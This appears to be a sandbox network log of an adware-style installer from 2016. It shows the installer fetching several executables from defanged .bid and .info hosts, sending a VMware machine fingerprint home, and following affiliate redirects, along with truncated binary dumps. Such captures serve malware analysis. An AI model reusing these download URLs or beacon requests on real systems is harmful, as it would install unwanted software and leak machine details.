Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 3782
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT
ETag: "f62071084680ed861fa12c3ea47cb6e1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pX-9uxJlT7jHPHPa1yz36Uw4GIzmVJmi_A2mcbd77axMEEGJVaJgoQ==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<...hIDATx..[kl#W....yO......?..u..H..P..J...$@..K...l. .}..}P@@.
.J........q..H@3.E.u@.".Zg7.$..$q..f..\...c;....(W;.].x.~......;....?.
.....c.|X........B...;D...rv&.M..eE...eZ..1Ts5....E?..{O.x....B.. ..=B
...D...~.,,..p.493...XB.R...2&......1...., .5.....b[.B`ae...oF...p.FZ.
,."..zh......p...yH.l>!4:. .[aXi.3.... |.. ..t.....J...../4...(T.me
L..'9ceC.]R//...FkW.Z...vpb6d..?......=.x..M.RO....P..p[c-..K.p.,v....
....K.|.=......:!..2............<`....j....Mq...C<{*L2j.^05g.q=}
qy`..sy ]3.UK.j.....o.Z.......2&u5{.fw.}6.Oe8cuCO._..<.Jd.9.;......
.[4.2.i....y.K.Z.......q..J.A^..g......1..|.lN.)8............f.q]...4.
...........I..c...=.2..[..2LZ.1rIf....3.....M...2.M.f..R siU..i..0....
.9_.?.'...S.R#.sN.{.s.........@7...%..{........w>....A.V...{?..V9.*
G.....,.......lA.:7.........E.q.C..._W.Dd.k;&D..4..E}3.}..X.c.)`.!.$..
.R.........X.<....^.PH..NO.)...^KM-.......:.8...Q..S7.`. ...V...D.@
.'.<..x!..1.PU.ktr<R.@.W.......t....l..'d..n.'|v*...R..=.uau0..u
C...S.......G....F............f...h.XN.h..-(..../....l.f..fI..`G.|....
.\...bf..Q*...p....Y..R......w........\aj.TR..IUA.d.6...@.DqNi..8.#.l!
)l(,V....6m.<...E..../.y....P.......y.........O.f....-.....Y....B.(
.s..r....z<jf....m...[Hc...%5.....$..x.Z...u2.....h.........94{....
.9...\.wE.?....!E.\l..S...).....A...2FV.y..Z..d.HEPsy....!.*X.......?s
|.qM..y..U.s.......m....Zi.T......C....m.nB.......4.....Q.........) ..
.Ph..'.~|..nZ'.Fpk..:....3...)_|.~....H..gnM.J?k....$y......-.....
<<< skipped >>>


POST hXXp://ee.ilentialnessme.bid/installer.php?affId=2291&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&trackingId=135176390&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:22 GMT
Connection: close
Content-Length: 37480
....~h........7.zEh....< ..v.H....x.3..zPrd9F..........8. ..oH.X...
.{<...v"..VC...j.R.'L.3. ....;6.|.d,.z..$........1..1f%..Be ..M..7.
..K.)... ..B.(...:.....Z.........P2...*.z)NZei......H[ 3.......3...m.I
._AF.......6...@.$..[.v.....>....Y.o..<....i.|...T...!.#..M.....
.........SD.(....i..<R....|6.H.v[.B2....5j...$.pyj..^...9...D..~.. 
....6...8..._.#{..;z...6..u..d.K.....s..,zW...c...[.d..4.#.O.S..zoD...
4...-[A..s...A...Y..l....*zd...y...V.3;~-...%....t.ft.......e.MK..xMs.
..W?K.9.BA.Hs..q..d7..(.;o...O....F.... ..m.(......S..lZ..R...... ..[.
.4.t...u..u...<;*#.)_S.d.V,s. jX.).@.oM....k..}./^-l.e..uE.......l.
.,.W#......vK.i..yGY..H`..z.M5}..2(...-F&o./.$.4T.I?.!...7Ez.G.>...
..&....~.C3...(a#..`..AHs....H.v)So....~.).../).:#.<.{.).V....f....
V.F.X..?.......(....f.E..E..r...X......Y......5. ..3.-.H.....<.Z..Y
o.y..v...[.......t.......Dl.3.......LJ3Wj...:...).]k.W"6..W.5AB....t..
..bd`|....e^.K......N..\.-m...0T...?.....I.%...x4..{...........^[.X..^
...@o...CN....0.@...)0.#..4)...GA..KX1....u?.....)Vg..pz..G...O.,K"c".
0.(@ ..@..2......U......m.to...r.1.4. a..G.v.._0.a......c~..........R!
v.CVH..-&..q.........n ..z..C.@d...... ;w.D..S.8.F. .VT..}1.,.>.X..
.U...U.Z..f...W(}-$..K%..&...K.8...IA..,y2....1I#a\e.F...uX...[{k...9\
...D.Q^K.6.$fR..._.6C.uR'..}.;...$-.s....,.Pu\N..'.*..s.{r..e..H..1@.T
...J.X)z..d..PR...O...f.. k...t.S....1. .]../%/_.D6...x... .J..c..>
...X.N....a..."P...=B...y.'......<....Y$l.kj.......<>.[..oq..
..(Z..4Z.Fw.U.....>..A.ps.De.=..9MF...[;$G..H.....~...j.]..b..1
<<< skipped >>>


GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Installation HTTP/1.0
Host: wet.sodcattilyrem.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 60652
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="5827498a25abb_ua.exe"
X-Powered-By: ASP.NET
Date: Sat, 12 Nov 2016 16:55:38 GMT
Age: 44593
X-Cache: Hit from cloudfront
Via: 1.1 cd57e6888980d1e458b233b5ef20ee46.cloudfront.net (CloudFront)
X-Amz-Cf-Id: i8UIml3LnG1MKA8CDNO6PQ3HlSVYkDtsv9mUevVxV14GyEXXXEltOw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................n.......B...8............@..............
............`............@.................................4........@.
.........................d............................................
........................................text....m.......n.............
..... ..`.rdata..b*.......,...r..............@..@.data....~...........
...............@....ndata.......0...........................rsrc......
..@......................@..@.reloc..2....P......................@..B.
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u...
..@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.....
..P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


GET /taveara?q=setup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: gurusetman.info
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sun, 13 Nov 2016 05:19:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d640d2d826032587efe6ad339dd60f7a71479014358; expires=Mon, 13-Nov-17 05:19:18 GMT; path=/; domain=.gurusetman.info; HttpOnly
X-Powered-By: PHP/5.4.37
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: hXXp://greates.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: *
Access-Control-Request-Headers: *
Server: cloudflare-nginx
CF-RAY: 300fc49e36a12914-OTP
0..HTTP/1.1 301 Moved Permanently..Date: Sun, 13 Nov 2016 05:19:19 GMT
..Content-Type: text/html..Transfer-Encoding: chunked..Connection: kee
p-alive..Set-Cookie: __cfduid=d640d2d826032587efe6ad339dd60f7a71479014
358; expires=Mon, 13-Nov-17 05:19:18 GMT; path=/; domain=.gurusetman.i
nfo; HttpOnly..X-Powered-By: PHP/5.4.37..Pragma: no-cache..Cache-Contr
ol: no-cache, no-store, must-revalidate, max-age=0..Cache-Control: pos
t-check=0, pre-check=0..Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT..
Expires: Mon, 26 Jul 1997 05:00:00 GMT..Location: hXXp://greates.info?
ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvP
Eipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=s
etup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9
tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq2
1jfakgCiJWr..Access-Control-Allow-Credentials: true..Access-Control-Al
low-Headers: *..Access-Control-Request-Headers: *..Server: cloudflare-
nginx..CF-RAY: 300fc49e36a12914-OTP..0..
<<< skipped >>>


GET hXXp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:20 GMT
Connection: close
Content-Length: 593
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2
291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff
_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer
.php?affId={aff_id}&trackingId=135176390&instId=
2180&ho_trackingid={transaction_id}&cc={country
_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplor
er&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here
</a></body>..



GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.ilentialnessme.bid


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:30 GMT
Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X
-Powered-By: PHP/5.3.28..Date: Sun, 13 Nov 2016 05:18:30 GMT..Content-
Length: 0..



GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Sun, 13 Nov 2016 05:19:26 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2016 05:19:26 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716800
Connection: Close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........<...R..
.R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R
.......R...S...R..4....R..4....R..4....R.Rich..R......................
...PE..L...=0.X.................b........................@............
..............P............@..........................................
...8E......................\Z.. ...................................@..
.............\............................text...[`.......b...........
....... ..`.rdata..d............f..............@..@.data....[...@...4.
.................@....rsrc...8E.......F...L..............@..@.reloc..@
].......^..................@..B.......................................
......................................................................
......................................................................
......................................................................
................................................ ..........3.9.....V..
......D$.....^...j ..NF......3.9.tRj.h|.G..M..E......]..].......]..}..
.E.s..E.SSS.6Ph..G......YY...6....F.Sj..M............3..H..H....3....H
..|.H..x.H..t.H....H..t.H..3.9..XH.t..=.XH....XH.s...XH..j..6TF.......
}.j.....G.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G
\........G............................................................
................................_x._|................V........D$..t.V.
.=..Y..^...j...TF......j....H.X3.3..}.....H...G....H.....H.f....H.
<<< skipped >>>


GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2024
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:42 GMT
Last-Modified: Fri, 07 Oct 2016 08:03:05 GMT
ETag: "d9eb4e61c136f58576485da85fc9897d"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64430
X-Cache: Hit from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RNnNcZpMOUg5CGj4HVkrzEXlQWhIkZKaZJi-h-cKXyELoonJcVIG7Q==
..<html><head>..        <meta charset="utf-8">..    
    <meta name="description" content="">..        <meta name=
"viewport" content="width=device-width, initial-scale=1">..        
<title>Thank You Page</title>..        <link rel="style
sheet" href="assets/css/style.css">..    <body>..        <
header class="header">..        .<div class="header-top green"&g
t;</div>..        .<div class="header-bottom grey">..     
   ..<h1 class="typ">.............. .... ....................<
;/h1>..        .</div>..        </header>..        <
div id="widget">..            <div class="adnl_zone">..      
          <script type="text/javascript">..                /*<
;![CDATA[*/..                supp_key = "575f4f5e34f49079faeab77365968
081";..                supp_time = new Date().getTime();..            
    supp_channel = "";..                supp_code_format = "ads-sync.j
s";..                supp_click = "";..                supp_custom_par
ams = {};..                /*]]>*/..                </script>
..                <script type='text/javascript' src='//VVV.1-1ads.
com/js/show_ads_supp.js?pubId=907'></script>..            <
;/div>..        </div>..        <footer class="footer gree
n">..        .<div class="container">..        ..<h3 class
="green">.......... .................., .......... ................
.. ....................:</h3>..        ..<ul class="steps
<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1


Accept: text/css
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1967
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "92657668b4257695bd2699a787aee60b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64444
X-Cache: Hit from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TkxLSAtQrofDzYiZGGzEPDHmdWKYGV5NKLAXdAGX1Nu99LN1UPCSVg==
body{...margin: 0;...padding: 0;...font-family: Helvetica, Arial, sans
-serif;..}..h1{...margin: 0;...font-size: 28px;...font-weight: normal;
...text-align: center;...color: #333;..}...container{...margin: 0 auto
;...width: 980px;...padding-left: 20px;...padding-right: 20px;..}...he
ader h1.typ{...line-height: 80px;...padding-top: 0;..}...header h1{...
padding-top: 13px;..}...header h1 span{...display: block;...font-size:
 14px;..}...header-top, .header-bottom{...position: relative;...height
: 80px;...width: 100%;..}...header-top.green{...background: #22B573;..
}...header-top.blue{...background: #0461C9;..}...header-bottom.grey{..
.background: #CCCCCC;..}...header-bottom.light-blue{...background: #B6
D2F2;...border-bottom:1px solid #02294C;..}..#widget{...margin: 0 auto
;...margin-top: 50px;...margin-bottom: 150px;..}...footer{...position:
 relative;...width: 100%;...height: 216px;...background: #e5e5e5;...bo
rder-top: 1px solid #fff;...-webkit-box-sizing: border-box;...-moz-box
-sizing: border-box;...box-sizing: border-box;..}...footer:before{...p
osition: absolute;...left: 0;...right: 0;...top: -2px;...height: 1px;.
..width: 100%;...content: '';.....}...footer.green:before{...backgroun
d: #0F4C2E;..}...footer.blue:before{...background: #02294C;..}...foote
r h3{...margin-top: 38px;...margin-bottom: 28px;...font-size: 18px;...
text-align: center;...text-shadow: -1px 1px 0 #fff;..}...footer h3.gre
en{...color: #22B573;..}...footer h3.blue{...color: #0461C9;..}..ul.st
eps{...margin: 0;...padding: 0;...list-style-type: none;..}..ul.st
<<< skipped >>>

GET /favicon.ico HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive


HTTP/1.1 403 Forbidden
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 13 Nov 2016 05:18:13 GMT
Server: AmazonS3
Age: 82
X-Cache: Error from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60EcnCsHeMmojKoDEP-Ks0uEmJniEtuHug==
f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code
>AccessDenied</Code><Message>Access Denied</Message&
gt;<RequestId>5BB8DEA19076C304</RequestId><HostId>LW
Cozxd6XPbPKEl3NYSn/ yXE9CAeg0hAv0mqYqDTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bd
imk=</HostId></Error>..0..HTTP/1.1 403 Forbidden..Content-
Type: application/xml..Transfer-Encoding: chunked..Connection: keep-al
ive..Date: Sun, 13 Nov 2016 05:18:13 GMT..Server: AmazonS3..Age: 82..X
-Cache: Error from cloudfront..Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0
fb.cloudfront.net (CloudFront)..X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60Ecn
CsHeMmojKoDEP-Ks0uEmJniEtuHug==..f3..<?xml version="1.0" encoding="
UTF-8"?>.<Error><Code>AccessDenied</Code><Mess
age>Access Denied</Message><RequestId>5BB8DEA19076C304&
lt;/RequestId><HostId>LWCozxd6XPbPKEl3NYSn/ yXE9CAeg0hAv0mqYq
DTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bdimk=</HostId></Error>..0.
.



GET /js/show_ads_supp.js?pubId=907 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.1-1ads.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=3600
Transfer-Encoding: chunked
Date: Sun, 13 Nov 2016 05:19:34 GMT
Connection: close
2000..var supp_ads_host_overridden="//VVV.1-1ads.com";.var supp_key,su
pp_channel,supp_code_format,supp_ads_host,supp_ads_host_overridden,sup
p_click,supp_custom_params,supp_width,supp_height,supp_target_id,supp_
template_target_id,SuppConfig,SuppAdsConfig=SuppConfig,CustomWLAdServe
r=CustomWLAdServer||{requests:[]};.CustomWLAdServer.sendbackPlacementK
eyFromRequests=function(a){var c=CustomWLAdServer;if(c.requests&&0<
c.requests.length&&c.passbackCallbacks&&c.passbackCallbacks["v2-" a])f
or(var b in c.passbackCallbacks["v2-" a]){var d=c.findRepReqByKey(b);(
d=d&&(d.supp_target_id||d.elemId))&&document.getElementById(d)&&c.doPo
stMessageFuncIntoIFrames(document.getElementById(d),"customwl.plkey.fo
r.banner" a "\x3d" b)}};.try{var messageEventListener=function(a){if(a
&&a.data&&"string"===typeof a.data){if(0==a.data.indexOf("rrImpl")){tr
y{eval("CustomWLAdServer." a.data)}catch(c){console.warn(c)}return!0}i
f(0==a.data.indexOf("sendRequestInfo:")){var b=a.data.substring(16),b=
CustomWLAdServer.findRepReqByKey(b);if(null!=b)return b.elemId&&docume
nt.getElementById(b.elemId)&&document.getElementById(b.elemId).content
Window&&document.getElementById(b.elemId).contentWindow.postMessage("r
equestInfoMessage:" JSON.stringify(b),."*"),!0}if(0===a.data.indexOf("
customwl.plkey.request.for.banner\x3d")){var b=a.data.split("\x3d")[1]
,d=CustomWLAdServer,e=d.passbackCallbacks&&d.passbackCallbacks["v2-" b
];if(e)if(1==Object.keys(e).length)e[Object.keys(e)[0]]();else d.sendb
ackPlacementKeyFromRequests(b)}if(0==a.data.indexOf("requestInfoMe
<<< skipped >>>


GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png HTTP/1.1
Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 1519
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT
ETag: "659184a48243f6ae257bc88d601ac7e1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hwFaWw-7Nj8eeAHF2MXvCTn7uuTK6GtEQuMIKFI2ctTLJUFa2FHwEQ==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<....IDATx..[.O[u.........(.E....o..............U0...Q`.%...}0..$
..d....%&=<.H.|q.sNZ..R..=7.._/P...Z.....rN.....;..0`.......0`.....
S<q..x.6...8. .....4=A].....Y...L<y~&\".I.G..X.Y,......L\{......
./..s.Id.1L....si6o@.c.4.h...5:8.....!...............j..W.h..UvZ...bC.
B....1..j\YZ..9...9....r0..8......V...\..[.HO.y..`.{w..SQ.[.m..L.V.nli
.....L..`..n&...\.bZ.U.@.q...u.......wJ.~.f......:.......x.i.g.......s
...>4...J...z .^r.z..3....RO<y.wI.).Z..v......^p.u.y"H....W*6Q..
tX."?..w...'...%. .......f.|o....3.s......:.Zz].2.............|.v..U..
..c..z.b....i........>....q.S .....'k3...6.......>D.qY.E........
....................1e1=.Ff)..o..|_..O...z...P6. ... ....?O.S...=.DtU.
.c.-C....SG.%.Y....*.......#.=y.K.quyM.......g.(....\9y.Y..s\v....!...
....>@..d............I..d{.m...!..zFR..........._#rr9.g....ut~....!
..;....-....*w...Hx.E.C]........}.....c.n"..>.".._.ZQ.C.."....q.j".
..... ......._I....S.g.....f...o3..Q...jpf......s.)...1B].SO..3..$N..]
.g(.z......D.......T...C/......u.a}....`. ":m.-m..W.....4..JJ.}...%.U.
T....-.N.....m."..?YE...q=....|P.....X.H,.......|..J.F.#M.......w.t...
Xrr&..e=;.a......R.e.RN...2....n-....g..8d../;....b......p..).&.0Xm.._
.Gs.T..V.y.mo..3....h...F.-.^HH......k....2i...v..&.......j..s,...~ok.
.....=......n.`.x..1.-.I...G..V...F...,U.K...Hb".;p...A/...s.V/.._....
7q.S.|....&.~81v-..../...!.G.Q.m............\./*.$h...>..*.u.@b.ZM~
h1yH..W.E...Wp].a.'{....8r.A,...r.....).hY...?.KE.u.........._...d
<<< skipped >>>


GET /get.php?ses=429155916441231936 HTTP/1.0
Host: away.yosauruslega.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 636416
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Sun, 13 Nov 2016 05:18:17 GMT
X-Cache: Miss from cloudfront
Via: 1.1 420810dc8ca5cb74b64cae9e4b264cc9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WzMfcmhZ-U-zig-ivUSgMwISw4lkFuvogIDTJNXx0sRnwuKboE_IfQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........4.Q.U...U..
.U..r....U..r....U..r....U.......U.......U.......U.... ..U...U...U..S.
...U..T....U...U|..U..S....U..Rich.U..........................PE..L...
h.'X.................\...t...............p....@.......................
... ............@.....................................P........5......
................| ......p...........................@...@............p
..p............................text....Z.......\.................. ..`
.rdata.......p.......`..............@..@.data....Y...0...<.........
.........@....gfids...............P..............@..@.tls.............
....R..............@....rsrc....5.......6...T..............@..@.reloc.
.| .......,..................@..B.....................................
......................................................................
......................................................................
................................................4.I..6;..h.iD...H.I...
....D.I.......4.I.......Y.................L.I...:..j.h .D...`.I.......
\.I.......L.I....:..h.iD..k...Y....j..g...h.iD...8.D..d.I..J........d.
I..h.I....jI..a...h.jD..'...Y.....................X........F..F......O
..O..o....^R].c.h..E...!..:..|..L..9.....P.u..E....8.........?b.0.....
E..D.(.}!W.0...YY....D...|...v........D.....v............u..E.........
.....'......|..D..8.....P...U......E..M..E..E..E.P.|..L.P.D.....]...U.
.Q_.u....u..dv.........B..q7;<..L.s&......?...k.0.....E..D.!.t.
<<< skipped >>>


GET hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital


HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:21 GMT
Connection: close
Content-Length: 1768
...S.T '.QE9..bb,........a...Y $.4$.r!.Ss......Xd<..._&.....T.....,
..LMPLpR,..>..K.. .q..r.yI}P.@i..dz..K18....&8.......@.F.wO. ..<
............-)....d......u.....[.....-..RD.u..>.....X].#..2.\...y..
-.=.X......Y..*2..>hD..."._?......).&ceC._ 8Uw.!......`y.X6.....*..
....a`..f...-.v...)X....../f.jD......6..*.:..6...F..G...D%(......qm.}.
`..w.JR...j.._VB.xw..s.z.W..w....*..?1./.jRp..$.g..7.Xv)...........M..
...b....*X.heboL...{.s>.t ........{.x......<..Q.....[...sb.=..JK
x..2X.@O.$.d.Y .j{.%A.[.=..g..|N#....%!...^..q)......}^.....7dN`o..{;.
A..O......g..%...r.].Dy.j.. t . p.x.|R.[#...$...G. .?..H....8..... ..w
c......W..hv:z...[...[...8....V.....v.)..j.......Do".fq"..@..jI.......
